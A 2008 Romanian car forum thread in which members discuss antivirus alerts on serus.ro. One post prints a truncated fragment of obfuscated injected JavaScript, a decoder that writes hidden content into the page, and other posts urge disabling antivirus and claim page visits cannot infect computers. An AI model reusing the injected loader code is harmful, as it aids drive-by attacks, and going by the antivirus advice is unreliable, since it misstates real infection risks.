Troian pe site-ul SERUS.RO, am trait sa o vad si pe asta
![]() ![]() ![]() |
Troian pe site-ul SERUS.RO, am trait sa o vad si pe asta
2dor |
![]()
|
||
![]() Desi nu pare, acum sunt fan iPhone Group: Members Posts: 2.827 Joined: 14 April 06 From: Bucuresti ![]() |
Attached thumbnail(s) untitled.jpg ( Size: 208.05k ) Number of downloads: 484 |
||
--------------------
Ford
Mondeo Vignale Hybrid
2018 Be nimble as a greyhound, as tough as leather, as hard as Krupp steel and so you shall be the German warrior incarnate.
|
|||
xcss |
![]()
|
![]() Born to Be Epic Group: Members Posts: 1.669 Joined: 24 August 07 ![]() |
Confirm si eu...
|
--------------------
-
-
- Mit der Dummheit kämpfen Götter selbst vergebens.
|
|
C a t a l i n |
![]()
|
![]() ______________________ Group: Members Posts: 12.175 Joined: 21 August 06 ![]() |
Bonus împreună cu omniprezentul discount.
|
--------------------
-
-
- Când vrei și, și, iese nici, nici!
|
|
Amedeus |
![]()
|
![]() Membru cu Logan Group: Members Posts: 1.907 Joined: 13 December 04 From: TM ![]() |
|
--------------------
Renault
Megane Sedan IV Tce 116
2019 Business
|
|
OVIDIUS |
![]()
|
![]() bogat în valori simple Group: Members Posts: 1.726 Joined: 14 February 05 From: Orasu' lui Bucur ![]() |
Super tare...
![]() Am auzit ca astia de la VW au considerat-o ca fiind ultima sansa sa le scada vanzarile... |
--------------------
Renault
Laguna
2.0 T 2007 / Dinamique + Twingo 1.2 16v 2004 Chiar si ziua de luni poate aduce minuni...
|
|
M i h a i |
![]()
|
![]() _______________________ Group: Members Posts: 5.669 Joined: 12 September 06 ![]() |
Este de o luna si ceva cred....nu este ceva recent...
![]() |
--------------------
------
------
------
|
|
Andy_ACS |
![]()
|
![]() Yes, I'm not! Group: Members Posts: 6.304 Joined: 19 July 04 From: Craiova ![]() |
Daca e prezent acolo pe site de peste o luna.... ma intreb oare ce e in computerul de bord de la masini?
![]() Chiar asa nu sunt in stare sa rezolve problema? Mie imi placea siteul asta pentru ca era plin de informatii actuale si destul de complete... se pare ca avea si un bonus ![]() Bafta! |
--------------------
-
-
- "Be the change you want to see in the world"
|
|
Bliss |
![]()
|
![]() - Group: Members Posts: 937 Joined: 10 July 06 ![]() |
Scapati de "antivirusurile" alea, va fac mai mult rau decat bine. Sau cel putin dezactivati modulul de web.
![]() Pe serus.ro identifica in mod gresit iframe-ul ce apare la intrarea in site cu "Vrei sa testezi noul Laguna?" ca fiind troian. Dezactivati temporar antivirusul, apoi intrati iar in site si o sa vedeti ce o sa apara. Troian pe un site web e oricum o denumire gresita, cel mult script malware. |
--------------------
-
-
-
|
|
argon |
![]()
|
![]() Mesaj semiautomat Group: Members Posts: 33.671 Joined: 15 August 05 ![]() |
exact, nu site-ul e problema ci tembelismele alea de antivirusi care dau alarme false sa se simta impliniti cetatenii care au mai dat si bani pe ele
![]() PS: Schimbati va rog titlul in "Nod32 e un antivirus de cacao". Multumesc. This post has been edited by argon: 9 Apr 2008, 12:34 |
--------------------
Renault
Laguna
2007
- 2.0 DCI 16v 180 Fara turbo, viata e pustiu.
|
|
Lostboy |
![]()
|
![]() Finding my way! Group: Members Posts: 3.261 Joined: 17 May 06 ![]() |
kaspersky 6 nu a dat niciodata alarme false!
![]() |
--------------------
.
.
.
|
|
Cypher4laguna |
![]()
|
![]() Honda Driver Group: Members Posts: 931 Joined: 2 November 04 From: Bucuresti ![]() |
nici Bitdefender 9 sau 10... dar deja o dam in offtopic.
![]() |
--------------------
Honda
Civic & Jazz
ex-'06 Logan Laureate 1,5 dci
|
|
bonzai |
![]()
|
![]() Membru autentic Group: Members Posts: 710 Joined: 15 April 05 From: Bucuresti ![]() |
Confirm si eu... NOD32 raporteaza, NAV Corporate, nu. Eu reusesc sa intru folosind subpaginile din history. Asa se evita pagina de start.
|
--------------------
Renault
Megane 4 GT
2017
|
|
paul_p |
![]()
|
![]() Membru autentic Group: Members Posts: 1.133 Joined: 1 April 06 From: psd=evil ![]() |
E ceva mai grav decat iframe, e un troian care se foloseste de iframe pentru a se instala : Symantec Endpoint Protection mi-a raportat un troian : Trojan.Nebuler
Cei care au dezactivat antivirusul ar trebui sa verifice daca nu s-au lipit cumva de acest troian. This post has been edited by paul_p: 9 Apr 2008, 18:44 |
--------------------
Fara
roti
fara ipocriti
- 2010
|
|
driverx |
![]()
|
![]() --- Membru cu ralanti --- Group: Members Posts: 7.656 Joined: 21 November 03 ![]() |
QUOTE(Lostboy @ 9 Apr 2008, 12:57) Pana maine iti scriu si eu un antivirus care sta rezident acolo in tray la tine sa te simti tu bine, si te asigur ca nu o sa dea nici o alarma, fie ea falsa sau mai stiu eu de care. Da' sa fiu putin ![]() |
--------------------
Mitsubishi
Lancer
2008 Univega Alpina HT-LTD Disc Deore 2011
|
|
Bliss |
![]()
|
QUOTE(paul_p @ 9 Apr 2008, 19:40) E ceva mai grav decat iframe, e un troian care se foloseste de iframe pentru a se instala : Symantec Endpoint Protection mi-a raportat un troian : Trojan.Nebuler Cei care au dezactivat antivirusul ar trebui sa verifice daca nu s-au lipit cumva de acest troian. Eu nu am antivirus si, ca sa vezi, nici troianul ala raportat n-a binevoit sa-mi calce pragul calculatorului. ![]() ![]() Astea-s fisierele JS incluse in pagina: http://www.serus.ro/renault/Scripts/AC_RunActiveContent.js http://www.serus.ro/renault/flashobject.js http://www.serus.ro/renault/ieupdate.js http://www.serus.ro/renault/stm31.js Inca un pic de cod JS e inclus direct in pagina. |
--------------------
-
-
-
|
|
paul_p |
![]()
|
![]() Membru autentic Group: Members Posts: 1.133 Joined: 1 April 06 From: psd=evil ![]() |
@Bliss : Intre timp au remediat problema, de aceea nu ai mai gasit tu nimic din troianul lu' peste ! Ai avut noroc ca nu ai intrat mai devreme, ca fara antivirus te procopseai probabil cu ceva musafiri.
Acum intradevar totul e OK, nu mai pare a fi nici o problema cu site-ul. This post has been edited by paul_p: 9 Apr 2008, 22:52 |
--------------------
Fara
roti
fara ipocriti
- 2010
|
|
xcss |
![]()
|
![]() Born to Be Epic Group: Members Posts: 1.669 Joined: 24 August 07 ![]() |
Hm... Mie imi apar in continuare avertizarile - vreo 5 - dupa care se incarca, dar...
untitled.JPG ( Size: 156.93k ) Number of downloads: 182 This post has been edited by xcss: 9 Apr 2008, 23:00 |
--------------------
-
-
- Mit der Dummheit kämpfen Götter selbst vergebens.
|
|
bebecool |
![]()
|
![]() Doctor de oase Group: Members Posts: 549 Joined: 26 October 06 From: Pa scaun ![]() |
![]() Nod32-versiuna 3-nod rullz-am avut multe dar nodu e mai fiabil ca un reno:))sa zic asa |
--------------------
Renault/Opel
Megane 2 1.5dci 80cp/ Focus 2 1.6Tdci 2009
2007
- B-08-BBM Banii fac fericirea celor care nu merita alta fericire. (G. Gesbron)
|
|
ady85btz |
![]()
|
![]() Membru onorific Group: Members Posts: 3.803 Joined: 16 March 06 From: Bucuresti ![]() |
nu am antivirus asa ca pot intra linistit
![]() |
--------------------
Kia
Cee'd ~the BEST~
1.4T 16V "The Power to Surprise"™
Ex- Dacia Logan Ambition 1.5 dCi Ex- Dacia 1310 Sport |
|
Bliss |
![]()
|
Am intrat de dimineata imediat ce s-a semnalat "problema" aici. Ca idee, imi castig painea din domeniu, nu vorbesc in dodii.
![]() |
--------------------
-
-
-
|
|
deconectat |
![]()
|
![]() Membru cu avatar de sezon Group: Members Posts: 1.116 Joined: 11 January 05 From: Brasov ![]() |
Eu inca nu am auzit de troian care sa iti infecteze singur calculatorul pentru ca ai intrat tu pe o pagina...ca sa nu mai zic de tampenia cu IFrame trojan care vrea sa ne sugereze ca iframe-urile prezinta un risc de securitate mai mare decat o pagina fara iframe-uri...
Folositi cu incredere Firefox si inchideti antivirusul...parerea mea. |
--------------------
logan
1.6 8v ambition
. Ex. DSN Rapsodie
|
|
paul_p |
![]()
|
QUOTE(Bliss @ 9 Apr 2008, 23:11) Am intrat de dimineata imediat ce s-a semnalat "problema" aici. Ca idee, imi castig painea din domeniu, nu vorbesc in dodii. ![]() Poate mai sapi un pic. Pe pagina, la sfarsit, acum exista acest cod ciudat: CODE <script language=JavaScript>var kco=" shapgvba hmdvx(oz){ine fz,we=\"{v^abRkP9 |V}!6w~pn)@GZro#[$y,`:SO0dMjm&AihU2W;5.lt8fH']u_\\\"q+7BIXNCegs13xT-c(4*z=\",t=\"\",du,dsj,v=\"\",nt;sbe(fz=0;fz<oz.yratgu;fz++){ du=oz.puneNg(fz);dsj=we.vaqrkBs(du);vs(dsj>-1){ nt=((dsj+1)%81-1);vs(nt<=0)nt+=81;v+=we.puneNg(nt-1); } ryfr v+=du;}t+=v;qbphzrag.jevgr(t);}",tuy="";for(mhs=0;mhs<kco.length;mhs++){ xcxg = kco.charCodeAt(mhs);if((xcxg>64 && xcxg<78)||(xcxg>96 && xcxg<110)) xcxg=xcxg+13; Decriptat inseamna : CODE function uzqik(bm){var sm,jr=\"{i^noExC9 |I}!6j~ca)@TMeb#[$l,`:FB0qZwz&NvuH2J;5.yg8sU']h_\\\"d+7OVKAPrtf13kG-p(4*m=\",g=\"\",qh,qfw,i=\"\",ag;for(sm=0;sm<bm.length;sm++){ qh=bm.charAt(sm);qfw=jr.indexOf(qh);if(qfw>-1){ ag=((qfw+1)%81-1);if(ag<=0)ag+=81;i+=jr.charAt(ag-1); } else i+=qh;}g+=i;document.write(g);}",ghl="";sbe(zuf=0;zuf<xpb.yratgu;zuf++){ kpkt = xpb.punePbqrNg(zuf);vs((kpkt>64 && kpkt<78)||(kpkt>96 && kpkt<110)) kpkt=kpkt+13; Mai sunt si altii care s-au lovit de problema http://www.codingforums.com/showthread.php?p=671538 Ei zic ca ar putea fi vorba de un troian Trojan.Mebroot Puteti verifica de exemplu cu GMER This post has been edited by paul_p: 10 Apr 2008, 01:36 |
--------------------
Fara
roti
fara ipocriti
- 2010
|
|
Bliss |
![]()
|
Mie nu-mi apare bucata aia de cod. Ce vad eu la http://www.serus.ro/renault/index.php: cod.
Ce browser folosesti? Poate apare doar la anumite useragent-uri (nume browser + versiune) de browsere ce pot fi afectate. This post has been edited by Bliss: 10 Apr 2008, 02:27 |
--------------------
-
-
-
|
|
argon |
![]()
|
![]() Mesaj semiautomat Group: Members Posts: 33.671 Joined: 15 August 05 ![]() |
|
--------------------
Renault
Laguna
2007
- 2.0 DCI 16v 180 Fara turbo, viata e pustiu.
|
|
chris_t |
![]()
|
![]() trepadus clasic Group: Members Posts: 309 Joined: 19 August 04 From: Baia Mare ![]() |
Eu am BitDef 10, am intrat pe Serus zilele trecute, nu zicea nimic. Am mai scanat si cu altceva, tot nimic.
|
--------------------
Renault
Megane Estate
2017 ZEN
|
|
Lostboy |
![]()
|
![]() Finding my way! Group: Members Posts: 3.261 Joined: 17 May 06 ![]() |
QUOTE(driverx @ 9 Apr 2008, 19:10) Pana maine iti scriu si eu un antivirus care sta rezident acolo in tray la tine sa te simti tu bine, si te asigur ca nu o sa dea nici o alarma, fie ea falsa sau mai stiu eu de care. Da' sa fiu putin ![]() Să-mi zici când termini. Nu de alta, dar vreau ceva personalizat. ![]() Oricât ați spune voi că nu aveți antivirus, asta nu înseamnă că nu ai nevoie. Nu de puține ori am primit un link despre care nu știam nimic și de la persoane de încredere, dar asta nu înseamnă că nu există riscuri. depinde de antivirus are fiecare, dacă are update și dacă are sau nu licență. Folosesc kav 6 de aprox. 3 ani și nu am avut probleme. Și am întâlnit destui care nu aveau antivirus și aveau varză calculatoarele. Fără net. Și da, pe un pentium III cu 256mb antivirusul încetinește. ![]() |
--------------------
.
.
.
|
|
adrian.paul |
![]()
|
![]() Membru autentic Group: Members Posts: 367 Joined: 23 July 06 From: Bucuresti ![]() |
Norton Internet Security 2008 nu zice nici pâs acolo.
This post has been edited by adrian.paul: 10 Apr 2008, 14:56 |
--------------------
Logan
Prestige
2008 1.5 Dci
|
|
Kruger |
![]()
|
Membru autentic Group: Members Posts: 1.660 Joined: 18 August 05 From: Bucuresti ![]() |
Trend Micro zice ca e totul in regula
|
--------------------
Honda
Accord
2005, Sport Tourer Automatic 2.0 VITEZA NU UCIDE
OPRIREA BRUSCA DA |
|
ilgo |
![]() ![]()
|
![]() Membru incepator Group: Members Posts: 39 Joined: 23 March 08 ![]() |
Confirmat!
BitDefender > Trojan.Mezzia.CY > Your computer is protected! Am avut celebrul Norton si troienii erau ca la ei acasa ![]() This post has been edited by ilgo: 10 Apr 2008, 15:42 |
--------------------
-
-
-
|
|
danic21 |
![]()
|
Membru incepator Group: Members Posts: 1 Joined: 10 April 08 ![]() |
Opera nu foloseste nimeni?
![]() |
--------------------
Daewoo
Cielo
2003
|
|
![]() ![]() ![]() |
Lo-Fi Version Harta site Parteneri Jocuri online Curs Valutar HRH Haine din lana merinos | Time is now: 6th June 2025 - 12:05 |